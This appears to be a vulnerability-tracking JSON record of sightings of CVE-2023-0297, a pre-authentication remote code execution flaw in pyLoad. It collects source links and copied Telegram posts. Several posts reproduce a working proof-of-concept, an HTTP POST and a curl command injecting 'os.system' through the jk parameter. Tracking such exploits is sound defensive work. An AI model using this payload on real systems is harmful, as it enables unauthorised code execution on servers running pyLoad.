{"vulnerability": "CVE-2023-0297", "sightings": [{"uuid": "463d87d7-0425-49e7-876f-f62aeb73de4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-0297", "type": "exploited", "source": "https://www.exploit-db.com/exploits/51532", "content": "", "creation_timestamp": "2023-06-14T00:00:00.000000Z"}, {"uuid": "c8ebcd06-5707-4fb6-9e7c-49203352b5b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-0297", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:50.000000Z"}, {"uuid": "4440861d-8132-4256-a902-c25411a8125a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-0297", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:45.000000Z"}, {"uuid": "1448540f-c8e3-45d1-972b-a73dbf70a063", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-0297", "type": "seen", "source": "MISP/a9d21043-f825-4bac-8d2b-56fb9e8343e7", "content": "", "creation_timestamp": "2025-10-23T21:13:00.000000Z"}, {"uuid": "9892b92b-1ccb-4374-a725-9330b1f95f78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-0297", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/pyload_js2py_exec.rb", "content": "", "creation_timestamp": "2023-02-21T21:44:56.000000Z"}, {"uuid": "b0e57b04-5a3d-474d-9219-fb965a2e4faa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-0297", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9270", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aCVE-2023-0297 is a critical pre-authentication remote code execution (RCE) vulnerability in pyLoad versions before 0.5.0b3.dev31.\nURL\uff1ahttps://github.com/oxapavan/CVE-2023-0297\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-11-30T21:11:36.000000Z"}, {"uuid": "453997bf-47eb-48b9-a7d1-6ed9b245240e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-0297", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8671", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aRCE in pyload prior to 0.5.0b3.dev31.\nURL\uff1ahttps://github.com/S4MY9/CVE-2023-0297\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-10-04T12:04:54.000000Z"}, {"uuid": "818102e1-b73c-4c92-82d0-68653526bfcf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-0297", "type": "published-proof-of-concept", "source": "https://t.me/poxek/2924", "content": "Pre-auth RCE in pyLoad (CVE-2023-0297)\n\npyLoad - \u044d\u0442\u043e \u043c\u0435\u043d\u0435\u0434\u0436\u0435\u0440 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 OSS, \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 \u043d\u0430 Python \u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u043c\u044b\u0439 \u0447\u0435\u0440\u0435\u0437 \u0432\u0435\u0431-\u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441. \u0412 \u043d\u0435\u043c \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u043d\u0430\u0448\u043b\u0438 \u0432\u0443\u043b\u043d\u0443 \u0438 \u0437\u0430\u0440\u0435\u043f\u043e\u0440\u0442\u0438\u043b\u0438 \u043d\u0430 \u0431\u0431, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0443\u044e \u0441 js2py. \u041a\u0440\u0430\u0442\u043a\u043e \u044d\u0442\u043e \u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0446\u0438\u044f JS \u0432 Python \ud83d\ude01\n\n\u0412 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 eval_js(), \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0438 \u043c\u043e\u043c\u0435\u043d\u0442, \u0447\u0442\u043e \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 jk \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 JS \u043a\u043e\u0434. \u041b\u044e\u0434\u0438 \u043f\u043e\u043a\u043e\u0432\u044b\u0440\u044f\u043b\u0438\u0441\u044c \u0438 \u043f\u043e\u043d\u044f\u043b\u0438, \u0447\u0442\u043e \u0442\u0443\u0434\u0430 \u0441\u043f\u043e\u043a\u043e\u0439\u043d\u043e \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u043b\u043e\u0436\u0438\u0442\u044c \u043b\u044e\u0431\u0443\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u0443.\n\n\u041d\u0443 \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u043e\u0441\u044c \u0442\u0430\u043a\n\nPOST /amogus/test HTTP/1.1\nHost: \nContent-Type: application/x-www-form-urlencoded\n\njk=pyimport%20os;os.system(\"touch%20/tmp/pwnd\");f=function%20f2(){};&amp;package=xxx&amp;crypted=AAAA&amp;&amp;passwords=aaa", "creation_timestamp": "2023-05-23T18:34:10.000000Z"}, {"uuid": "cddb8370-23d0-4b61-a4a9-cd749c99c7e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-0297", "type": "published-proof-of-concept", "source": "https://t.me/monkey_hacker/73", "content": "Pre-auth RCE in pyLoad (CVE-2023-0297)\n\npyLoad - \u044d\u0442\u043e \u043c\u0435\u043d\u0435\u0434\u0436\u0435\u0440 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 OSS, \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 \u043d\u0430 Python \u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u043c\u044b\u0439 \u0447\u0435\u0440\u0435\u0437 \u0432\u0435\u0431-\u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441. \u0412 \u043d\u0435\u043c \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u043d\u0430\u0448\u043b\u0438 \u0432\u0443\u043b\u043d\u0443 \u0438 \u0437\u0430\u0440\u0435\u043f\u043e\u0440\u0442\u0438\u043b\u0438 \u043d\u0430 \u0431\u0431, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0443\u044e \u0441 js2py. \u041a\u0440\u0430\u0442\u043a\u043e \u044d\u0442\u043e \u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0446\u0438\u044f JS \u0432 Python \ud83d\ude01\n\n\u0412 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 eval_js(), \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0438 \u043c\u043e\u043c\u0435\u043d\u0442, \u0447\u0442\u043e \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 jk \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 JS \u043a\u043e\u0434. \u041b\u044e\u0434\u0438 \u043f\u043e\u043a\u043e\u0432\u044b\u0440\u044f\u043b\u0438\u0441\u044c \u0438 \u043f\u043e\u043d\u044f\u043b\u0438, \u0447\u0442\u043e \u0442\u0443\u0434\u0430 \u0441\u043f\u043e\u043a\u043e\u0439\u043d\u043e \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u043b\u043e\u0436\u0438\u0442\u044c \u043b\u044e\u0431\u0443\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u0443.\n\n\u041d\u0443 \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u043e\u0441\u044c \u0442\u0430\u043a\n\nPOST /amogus/test HTTP/1.1\nHost: \nContent-Type: application/x-www-form-urlencoded\n\njk=pyimport%20os;os.system(\"touch%20/tmp/pwnd\");f=function%20f2(){};&amp;package=xxx&amp;crypted=AAAA&amp;&amp;passwords=aaa", "creation_timestamp": "2023-05-24T04:48:05.000000Z"}, {"uuid": "28070da9-74b4-4403-8d32-ba0e246a72c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-0297", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/402", "content": "CVE-2023-0297\nPre-auth RCE in pyLoad\n\nExploit Code:\ncurl -i -s -k -X $'POST' \\\n    --data-binary $'jk=pyimport%20os;os.system(\\\"touch%20/tmp/pwnd\\\");f=function%20f2(){};&amp;package=xxx&amp;crypted=AAAA&amp;&amp;passwords=aaaa' \\\n    $'http:///flash/addcrypted2'\n\n#exploit #poc", "creation_timestamp": "2024-08-20T17:04:49.000000Z"}, {"uuid": "704277bc-5227-46e2-8077-ed981a30f821", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-0297", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/1299", "content": "CVE-2023-0297\nPre-auth RCE in pyLoad\nread\nExploit Code:\ncurl -i -s -k -X $'POST' \\\n    --data-binary $'jk=pyimport%20os;os.system(\\\"touch%20/tmp/pwnd\\\");f=function%20f2(){};&amp;package=xxx&amp;crypted=AAAA&amp;&amp;passwords=aaaa' \\\n    $'http:///flash/addcrypted2'", "creation_timestamp": "2023-01-17T10:49:34.000000Z"}, {"uuid": "0c22b43c-cc4f-4d7b-9ebe-1db795c87c17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-0297", "type": "seen", "source": "https://t.me/alexredsec/314", "content": "\u0412\u044b\u0448\u043b\u0430 \u0442\u0440\u0435\u0442\u044c\u044f \u0438\u0442\u0435\u0440\u0430\u0446\u0438\u044f Exploit Prediction Scoring System (EPSS). \u041f\u0438\u0448\u0443\u0442, \u0447\u0442\u043e \u0441\u0442\u0430\u043b\u0430 \u043d\u0430 82% \u043a\u0440\u0443\u0447\u0435. \u0415\u0441\u0442\u044c \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u043f\u0440\u0438\u043a\u043e\u043b\u044c\u043d\u0430\u044f \u0438 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u0430\u044f \u0441\u0442\u0430\u0442\u044c\u044f \u043f\u0440\u043e \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f. \u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, EPSS-\u043d\u0438\u043a\u0438 \u043d\u0430\u0447\u0430\u043b\u0438 \u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043d\u0435 16 \u0441\u0432\u043e\u0439\u0441\u0442\u0432 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0430 \u0430\u0436 1164. \u0415\u0441\u0442\u044c \u043f\u043e\u0434\u043e\u0437\u0440\u0435\u043d\u0438\u0435, \u0447\u0442\u043e \u0431\u043e\u043b\u044c\u0448\u0430\u044f \u0447\u0430\u0441\u0442\u044c  \u044d\u0442\u0438\u0445 \u0441\u0432\u043e\u0439\u0441\u0442\u0432 \u044d\u0442\u043e \u043b\u0435\u0439\u0431\u043b\u044b \u0432\u0435\u043d\u0434\u043e\u0440\u043e\u0432, \u043a\u0430\u043a \u0432 \u0442\u0430\u0431\u043b\u0438\u0446\u0435. \u041d\u043e \u0432\u044b\u044f\u0441\u043d\u044f\u0442\u044c \u043a\u0430\u043a \u043e\u043d\u043e \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0434\u0435\u043b\u043e \u0432\u0441\u0451 \u0440\u0430\u0432\u043d\u043e \u043c\u0430\u043b\u043e\u043f\u0435\u0440\u0441\u043f\u0435\u043a\u0442\u0438\u0432\u043d\u043e\u0435, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \"\u0430 \u0432\u043d\u0443\u0442\u0440\u0438 \u0443 \u043d\u0435\u0439 \u043d\u0435\u0439\u0440\u043e\u043d\u043a\u0430\" (c). \u0412 \u0446\u0435\u043b\u043e\u043c, \u043f\u043e \u0437\u0430\u043f\u0443\u0442\u0430\u043d\u043d\u043e\u0441\u0442\u0438 \u0443\u0436\u0435 \u043f\u043e\u0445\u043e\u0436\u0435 \u043d\u0430 Tenable VPR. \u041d\u043e \u0431\u0435\u0441\u043f\u043b\u0430\u0442\u043d\u043e\u0441\u0442\u044c \u0432\u0441\u0451 \u0438\u0441\u043a\u0443\u043f\u0430\u0435\u0442. \ud83d\ude07 \u041a\u0441\u0442\u0430\u0442\u0438, \u0432 \u0441\u0442\u0430\u0442\u044c\u0435 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u044e\u0442 Tenable VPR \u0438 \u043f\u0440\u043e\u0447\u0438\u0435 \u043a\u043e\u043c\u043c\u0435\u0440\u0447\u0435\u0441\u043a\u0438\u0435 \u0441\u043a\u043e\u0440\u044b \u0438 \u043a\u0440\u0438\u0442\u0438\u043a\u0443\u044e\u0442 \u0438\u0445 \u0437\u0430 \u043f\u0440\u043e\u043f\u0440\u0438\u0435\u0442\u0430\u0440\u043d\u043e\u0441\u0442\u044c, \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u0443\u044e \u043d\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e\u0441\u0442\u044c \u0438 \u0442\u043e, \u0447\u0442\u043e \u043e\u043d\u0438 \u0447\u0430\u0441\u0442\u0438\u0447\u043d\u043e \u0431\u0430\u0437\u0438\u0440\u0443\u044e\u0442\u0441\u044f \u043d\u0430 \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u043d\u043e\u043c \u043c\u043d\u0435\u043d\u0438\u0438, \u0430 \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u043d\u0430 \u0434\u0430\u043d\u043d\u044b\u0445.\n\n\u041f\u043e\u0433\u043b\u044f\u0434\u0435\u043b \u0432\u044b\u0433\u0440\u0443\u0437\u043a\u0443 EPSS \u043d\u0430 \u043f\u0440\u0438\u043c\u0435\u0440\u0430\u0445. \n1. \u0414\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Word-\u0430 (CVE-2023-21716) \u0441 \u043d\u0435\u0434\u0430\u0432\u043d\u0438\u043c PoC-\u043e\u043c EPSS \u043e\u0447\u0435\u043d\u044c \u0432\u044b\u0441\u043e\u043a\u0438\u0439 (0.16846,0.95168). \n2. \u0414\u043b\u044f SPNEGO (CVE-2022-37958), \u0434\u043b\u044f \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u043e\u0436\u0438\u0434\u0430\u0435\u0442\u0441\u044f \u0432 Q2, EPSS \u0442\u043e\u0436\u0435 \u0432\u044b\u0441\u043e\u043a\u0438\u0439 (0.07896,0.93195). \n3. \u0414\u043b\u044f \u0440\u0430\u043d\u0434\u043e\u043c\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 MS Edge (CVE-2023-0696) \u0438\u0437 \u0444\u0435\u0432\u0440\u0430\u043b\u044c\u0441\u043a\u043e\u0433\u043e MS Patch Tuesday (\u0438\u0445 \u0434\u0435\u0441\u044f\u0442\u043a\u0438 \u043a\u0430\u0436\u0434\u044b\u0439 \u043c\u0435\u0441\u044f\u0446), EPSS \u043d\u0438\u0437\u043a\u0438\u0439 (0.00062,0.24659)\n4. \u0412\u0437\u044f\u043b \u043d\u0430\u043e\u0431\u043e\u0440\u043e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441 \u0432\u044b\u0441\u043e\u043a\u0438\u043c EPSS \u0438\u0437 \u0432\u044b\u0433\u0440\u0443\u0437\u043a\u0438 - CVE-2023-0297 (0.04128,0.90834). \u0422\u043e\u0436\u0435 \u043f\u043e\u043d\u044f\u0442\u043d\u043e \u043f\u043e\u0447\u0435\u043c\u0443, \u0442\u0430\u043c \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u043f\u0440\u044f\u043c\u043e \u0432 NVD.\n\n\u041d\u0430 \u043f\u0435\u0440\u0432\u044b\u0439 \u0432\u0437\u0433\u043b\u044f\u0434 \u0432\u0441\u0451 \u0432\u043f\u043e\u043b\u043d\u0435 \u0430\u0434\u0435\u043a\u0432\u0430\u0442\u043d\u043e. \ud83d\udc4d\n\n\u0422\u043e \u0435\u0441\u0442\u044c \u0434\u0435\u043b\u0430\u0442\u044c \u043f\u0440\u0438\u043e\u0440\u0438\u0442\u0438\u0437\u0430\u0446\u0438\u044e \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 EPSS \u044f \u0431\u044b \u043d\u0435 \u0441\u043e\u0432\u0435\u0442\u043e\u0432\u0430\u043b, \u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043a\u0430\u043a \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0444\u0430\u043a\u0442\u043e\u0440 \u0441 \u0432\u0435\u0441\u043e\u043c \u043a\u0430\u043a \u0443 CVSS Base Score (\u0430 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u0438 \u043f\u043e\u0432\u044b\u0448\u0435) \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0432\u043f\u043e\u043b\u043d\u0435 \u043e\u043f\u0440\u0430\u0432\u0434\u0430\u043d\u043d\u044b\u043c. \u0421\u043e\u0432\u0441\u0435\u043c \u0431\u0435\u0437 \u043f\u0440\u0438\u0447\u0438\u043d\u044b \u044d\u0442\u0430 \u0446\u0438\u0444\u0438\u0440\u044c \u0432\u0432\u0435\u0440\u0445 \u0432\u0440\u044f\u0434 \u043b\u0438 \u043f\u043e\u043f\u043e\u043b\u0437\u0435\u0442, \u0435\u0441\u043b\u0438 \u043e\u043d\u0430 \u0438\u0434\u0451\u0442 \u043a 0.9 \u0438 \u0432\u044b\u0448\u0435 \u0438\u043c\u0435\u0435\u0442 \u0441\u043c\u044b\u0441\u043b \u043f\u043e\u0433\u043b\u044f\u0434\u0435\u0442\u044c \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u0435\u0435. \u041f\u043e\u0434\u0443\u043c\u044b\u0432\u0430\u044e \u043d\u0430\u0447\u0430\u0442\u044c \u0443\u0447\u0438\u0442\u044b\u0432\u0430\u0442\u044c EPSS \u0432 Vulristics. \ud83d\ude09\n\n@avleonovrus #EPSS #TenableVPR #Tenable #Vulristics", "creation_timestamp": "2023-03-11T12:03:59.000000Z"}, {"uuid": "8c83cc53-188c-4b7b-91b8-2c7d7af3ac55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-0297", "type": "published-proof-of-concept", "source": "Telegram/n2KULA0ZDBe9JouPZU60255ZIS84-JTUnhcVpFqDs4kxwAQ", "content": "", "creation_timestamp": "2023-01-17T10:44:03.000000Z"}, {"uuid": "4f0d2a84-520f-48f9-b696-c9eaa8621336", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-0297", "type": "published-proof-of-concept", "source": "Telegram/o3_G1kH0eCOq14fPcLdmWqCHGks7S_O_IkgWXXNR9LGsiFk", "content": "", "creation_timestamp": "2023-02-07T07:46:05.000000Z"}, {"uuid": "32b3c318-fb35-4710-93e3-7f1cb57864f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-0297", "type": "published-proof-of-concept", "source": "https://t.me/crackcodes/2352", "content": "#exploit\n1. CVE-2022-41033:\nType confusion in Windows COM+ Event System Service\nhttps://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-41033.html\n\n2. CVE-2022-34718:\nDissecting and Exploiting TCP/IP RCE Vulnerability \"EvilESP\"\nhttps://securityintelligence.com/posts/dissecting-exploiting-tcp-ip-rce-vulnerability-evilesp\n\n3. CVE-2023-0297:\nPre-auth RCE in pyLoad\nhttps://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad", "creation_timestamp": "2023-01-21T13:09:37.000000Z"}, {"uuid": "d03520e1-5fe6-4919-99d5-df73da8ee208", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-0297", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/838", "content": "pyload \u8fdc\u7a0b\u6267\u884c\nPython  -u url -c \"ls\"", "creation_timestamp": "2023-08-09T11:07:16.000000Z"}, {"uuid": "e4d36d54-9840-4fbd-8018-88cbb4fb2a5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-0297", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/7591", "content": "#exploit\n1. CVE-2022-41033:\nType confusion in Windows COM+ Event System Service\nhttps://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-41033.html\n\n2. CVE-2022-34718:\nDissecting and Exploiting TCP/IP RCE Vulnerability \"EvilESP\"\nhttps://securityintelligence.com/posts/dissecting-exploiting-tcp-ip-rce-vulnerability-evilesp\n\n3. CVE-2023-0297:\nPre-auth RCE in pyLoad\nhttps://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad", "creation_timestamp": "2023-01-21T12:55:20.000000Z"}, {"uuid": "7ca711be-0691-45b0-9678-e5bd2fa14751", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-0297", "type": "seen", "source": "Telegram/gT5_rH6SbQjCDL5CnTfdxn2Fj6qxX4lRf2Kzqc0ICHxoeYM", "content": "", "creation_timestamp": "2023-04-02T20:32:57.000000Z"}, {"uuid": "55053a06-a29c-47a2-a82a-b8d357ac4744", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-0297", "type": "published-proof-of-concept", "source": "https://t.me/LearnExploit/4579", "content": "CVE-2023-0297 ( The Story of Finding Pre-auth RCE in pyLoad )\n\nGithub\n\n#CVE #RCE #exploit \n\u2014\u2014\u2014\u2014\u2014\u2014\u200c\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2023-05-20T00:25:52.000000Z"}]}